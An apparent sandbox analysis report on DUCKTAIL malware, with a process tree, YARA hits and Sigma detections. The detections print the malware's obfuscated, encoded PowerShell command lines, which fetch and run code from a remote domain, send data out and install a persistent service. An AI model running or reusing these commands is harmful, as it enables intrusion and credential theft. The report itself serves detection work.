    • cmd.exe (PID: 7328 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 7436 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 7468 cmdline: "cmd.exe" /c sc stop "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 7612 cmdline: sc stop "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 7636 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 7740 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 7888 cmdline: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 8028 cmdline: sc delete "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 8060 cmdline: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 8116 cmdline: net start "myRdpService" MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 8140 cmdline: C:\Windows\system32\net1 start "myRdpService" MD5: BA0BCCC6029FBBE6D8B41197F252742F)
    • powershell.exe (PID: 4468 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • myRdpService.exe (PID: 8188 cmdline: C:\Windows\Temp\myRdpService.exe cakoi10 MD5: F651568CD1F1A7ABAEDD4389DA3A2F14)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DUCKTAILAccording to Tony Lambert, this is a malware written in .NET. It was observed to be delivered using the .NET Single File deployment feature.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
eQwUFcwrXk.lnkJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security
    eQwUFcwrXk.lnkSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x82:$r1: pOWe^Rs^heL^L

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000002B.00000002.8189432745.00007FF68B676000.00000004.00000001.01000000.0000000A.sdmphacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
    • 0xdac4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
    • 0x11f94:$a2: 0123456789012345678901234567890123456789
    • 0x328ac:$a3: NTPASSWORD
    • 0x2f774:$a4: LMPASSWORD
    • 0x5cc54:$a5: aad3b435b51404eeaad3b435b51404ee
    • 0x14f54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
    Process Memory Space: powershell.exe PID: 8708INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x1b647f:$b1: ::WriteAllBytes(
    • 0x196bcb:$b2: ::FromBase64String(
    • 0x199a9c:$b2: ::FromBase64String(
    • 0x19c06c:$b2: ::FromBase64String(
    • 0x19c0de:$b2: ::FromBase64String(
    • 0x19efaf:$b2: ::FromBase64String(
    • 0x1a6ead:$b2: ::FromBase64String(
    • 0x1a9d7e:$b2: ::FromBase64String(
    • 0x1ce948:$b2: ::FromBase64String(
    • 0x32faec:$b2: ::FromBase64String(
    • 0x32fb44:$b2: ::FromBase64String(
    • 0x32fbc9:$b2: ::FromBase64String(
    • 0x32fc2d:$b2: ::FromBase64String(
    • 0x32fcb5:$b2: ::FromBase64String(
    • 0x32fd1d:$b2: ::FromBase64String(
    • 0x32ff4c:$b2: ::FromBase64String(
    • 0x32ffc1:$b2: ::FromBase64String(
    • 0x3d378e:$b2: ::FromBase64String(
    • 0x3d4133:$b2: ::FromBase64String(
    • 0x3d425f:$b2: ::FromBase64String(
    • 0x3d87cf:$b2: ::FromBase64String(
    Process Memory Space: powershell.exe PID: 5056INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x1762ea:$b1: ::WriteAllBytes(
    • 0x1641a1:$b2: ::FromBase64String(
    • 0x166c03:$b2: ::FromBase64String(
    • 0x1670a7:$b2: ::FromBase64String(
    • 0x167115:$b2: ::FromBase64String(
    • 0x16d5df:$b2: ::FromBase64String(
    • 0x1e3457:$b3: ::UTF8.GetString(
    • 0xc4e9:$s1: -join
    • 0xe2a9:$s1: -join
    • 0x7dd76:$s1: -join
    • 0x8ae4b:$s1: -join
    • 0x8e21d:$s1: -join
    • 0x8e8cf:$s1: -join
    • 0x903c0:$s1: -join
    • 0x925c6:$s1: -join
    • 0x92ded:$s1: -join
    • 0x9365d:$s1: -join
    • 0x93d98:$s1: -join
    • 0x93dca:$s1: -join
    • 0x93e12:$s1: -join
    • 0x93e31:$s1: -join
    Process Memory Space: svczHost.exe PID: 4540JoeSecurity_Ducktail_6Yara detected DucktailJoe Security
      Process Memory Space: svczHost.exe PID: 4540hacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
      • 0xc2f9b:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
      • 0xc46f7:$a2: 0123456789012345678901234567890123456789
      • 0xd109c:$a3: NTPASSWORD
      • 0xcfddf:$a4: LMPASSWORD
      • 0xe28b1:$a5: aad3b435b51404eeaad3b435b51404ee
      • 0xc55ef:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      43.2.myRdpService.exe.7ff68b170000.0.unpackhacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
      • 0x5118c4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
      • 0x515d94:$a2: 0123456789012345678901234567890123456789
      • 0x5366ac:$a3: NTPASSWORD
      • 0x533574:$a4: LMPASSWORD
      • 0x560a54:$a5: aad3b435b51404eeaad3b435b51404ee
      • 0x518d54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_5056.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xfd47:$b1: ::WriteAllBytes(
      • 0xc1a0:$b2: ::FromBase64String(
      • 0xec03:$b2: ::FromBase64String(
      • 0xf0a8:$b2: ::FromBase64String(
      • 0x52e:$b3: ::UTF8.GetString(
      • 0xbdf5:$s1: -join
      • 0x23e:$s4: +=
      • 0x261:$s4: +=
      • 0x55a1:$s4: +=
      • 0x5663:$s4: +=
      • 0x988a:$s4: +=
      • 0xb9a7:$s4: +=
      • 0xbc91:$s4: +=
      • 0xbdd7:$s4: +=
      • 0xf261:$s4: +=
      • 0xf45e:$s4: +=
      • 0x1171e:$s4: +=
      • 0x69aff:$s4: +=
      • 0x69b7f:$s4: +=
      • 0x69c45:$s4: +=
      • 0x69cc5:$s4: +=

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit, CommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 904, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit, ProcessId: 8632, ProcessName: cmd.exe
      Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit, CommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 904, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit, ProcessId: 8632, ProcessName: cmd.exe
      Sigma detected: PowerShell Base64 Encoded Invoke Keyword
      Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
      Sigma detected: PowerShell Base64 Encoded WMI Classes
      Source: Process startedAuthor: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA, CommandLine: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -Execution
      Sigma detected: Suspicious Encoded PowerShell Command Line
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB